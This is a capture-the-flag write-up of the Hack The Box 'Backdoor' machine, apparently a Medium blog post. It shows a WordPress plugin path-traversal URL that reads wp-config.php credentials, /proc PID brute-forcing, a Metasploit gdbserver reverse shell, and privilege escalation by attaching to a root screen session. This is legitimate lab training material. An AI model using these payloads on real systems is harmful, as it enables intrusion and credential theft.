Hack The Box::Backdoor

Source: twitter.com/hackthebox_eu/status/1461007660535459845

Information Gathering

First, I use rustscan for my port scanning process, this is for saving up some time to find any open ports in the address.

rustscan -a <ip address> -u <value>

From the scan, we know that there are 3 ports that are open. Port 22, 80 and 1337. Next, I use nmap to listen to each open port to know what service runs in each port.

nmap <ip address> -sV -p<port> -T4

Web Enumeration

I use gobuster to enumerate the IP Address and find out that the website is based on WordPress CMS.

gobuster dir -u <path> -x <file extension> -t <threads> -w <wordlists>

Next, I try to confirm that the website is based on WordPress CMS by using whatweb.

whatweb <ip address>

After it is confirmed then I try to find some available exploits that WordPress has by using tools called searchsploit.

searchsploit WordPress<version>

Now using wpscan in plugin detection mode to find some interesting finding in the plugin that is being used by the website.

wpscan — url <path> — api-token <token> — enumerate p, u —plugins-detection aggressive

For your information, the api-token is use for showing more information in which vulnerabilities that the tools detected. To generate the token you can go to this website, do a registration and login as a free member. From there you can get your own api-token :)

From the scan, it discovered that the website is using Akismet plugin and having one vulnerabilities with path http://10.10.11.125/wp-content/plugins/akismet/

From here, we can access the path http://10.10.11.125/wp-content/plugins/ and there is an eBook plugin present.

http://10.10.11.125/wp-content/plugins/

Now I search for the eBook plugin exploits using exploitdb and found it in here https://www.exploit-db.com/exploits/39575

From there, we can confirm that we have a Local File Inclusion vulnerability present in the website. Let’s try to exploit it.

From this vulnerability:

http://website.com/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

I try to change the website.com with the IP Address then access the path.

http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

It shows me a configuration files that I can download like this:

The config file has some credentials in it, let’s try the credentials to login into the website.

wp-config.php

WordPress has two login pages, one for the admin and one for the user. I’ve tried to login through http://10.10.11.125/wp-admin/ and http://10.10.11.125/wp-login/ by using the credentials from the wp-config.php but it’s rejecting the access.

http://10.10.11.125/wp-admin/
http://10.10.11.125/wp-login/

From here we know that we can do a file traversal, but we don’t know exactly what files are vulnerables. To find it, I use LFISuite, it’s a python based tool used to traverse and find any vulnerability in the files.

You can get this tools by using this command:

git clone https://github.com/D35m0nd142/LFISuite

This tool needs python2.7 and python2-pip. Since there’s no pip for python2 is not on the Kali Linux repository anymore. You can download it using these commands:

curl https://bootstrap.pypa.io/pip/2.7/get-pip.py — output /tmp/get-pip.py

sudo python2 /tmp/get-pip.py

After that you just need to go to the LFISuite directory and type:

python lfisuite.py or python2 lfisuite.py, anything that works out

If you stumble on error regarding termcolor, you can use this command:

sudo cp /usr/lib/python3/dist-packages/termcolor.py /usr/lib/python2.7/dist-packages

Then you are good to go :)

We can see the result highlighted in red colour indicating that the path /etc/passwd may contain some useful information. So I use Burp Suite to intercept the request and see the response form the website to see if I can find some useful information.

Request
Response

The response seems to have no useful information, then back again to see another port from the nmap. There is port 1337 with waste running as its service. So I did some quick research regarding waste and its connection with port 1337 then I got this information.

“WASTE is a peer-to-peer and friend-to-friend protocol and software application developed by Justin Frankel at Nullsoft in 2003 that features instant messaging, chat rooms, and file browsing/sharing capabilities”

From that information I find a website about file inclusion penetration testing https://zsahi.wordpress.com/2018/09/10/file-inclusion/

In there, I find an information that we can brute force the Process ID by using this payload

http://10.10.11.125/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/pid/cmdline

If you take a look at /proc/pid/cmdline, pid can be varies from 1 until unknown

From there, I try to use a python script to brute force the PID from 1 to 1000 to find if there is any info related to port 1337.

This is the script:

Then this is the result:

From here I can see that PID 851 shows port 1337 is running a gdbserver. From what I search, gdbserver is a remote debugger that allows programs to do debugging from another machine.

Exploitation

Now I can use metasploit to get a reverse shell from a gdbserver remote payload execution.

These are the steps for using msfconsole:

  • msfconsole
  • search gdb → select exploit/multi/gdb/gdb_server_exec
  • show options
  • set RHOSTS → target IP
  • set RPORT → 1337
  • set LHOST → OpenVPN from HTB
  • set target 1
  • set payload 5

After doing so, type show options and check if all settings are correct.

When all settings are correct, type run to execute the payload

Then I type ls to list down any directory from the target server. In here I see a text file named user.txt, maybe I can get the user flag if I try to access the file.

There it is, finally I get the user flag from the machine.

Privilege Escalation

After that, I took a rest for the day and the next day I tried again using metasploit to search for a way for doing a privilege escalation.

After repeating the same steps. Something caught my attention.

As we can see, there is an additional directory named screen-exploit. This could be a hint where I can do my privilege escalation.

From here, I typed shell to execute the shell and typed whoami to checked my privilege.

To make sure about it, I tried to copy linpeas.sh from my local machine to the remote server by using tools called updog.

To download the file in remote server, I need to spawn a terminal, so I used python3 -c “import pty;pty.spawn(‘/bin/bash’)” so that I can used the terminal.

After that, I used wget to download the file.

Now it’s time to execute the linpeas.

From here, there are 2 things that caught my attention.

As we can see, there is a screen session that attached to the root system when I spawned the terminal using the python3 script above.

This findings can confirm about the screen-exploit file before. From the hint before, we can try to do screen exploitation by using screen -x root/root. This command used for attaching any working terminal within with my current terminal

After that, I need to set my terminal type to Linux by using the export TERM=xterm command. Then I can execute the command screen -x root/root to attach my terminal to the running root terminal.

There you go, now I logged in as the root privilege where there is root.txt and it contains the system flag. Finally, I’ve owned the box.

Thank you for reading my first write up. Sorry if there are any mistakes in the explanation. Hopefully you enjoy reading it and learn more from it.

Have a nice day. Adios \^o^/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store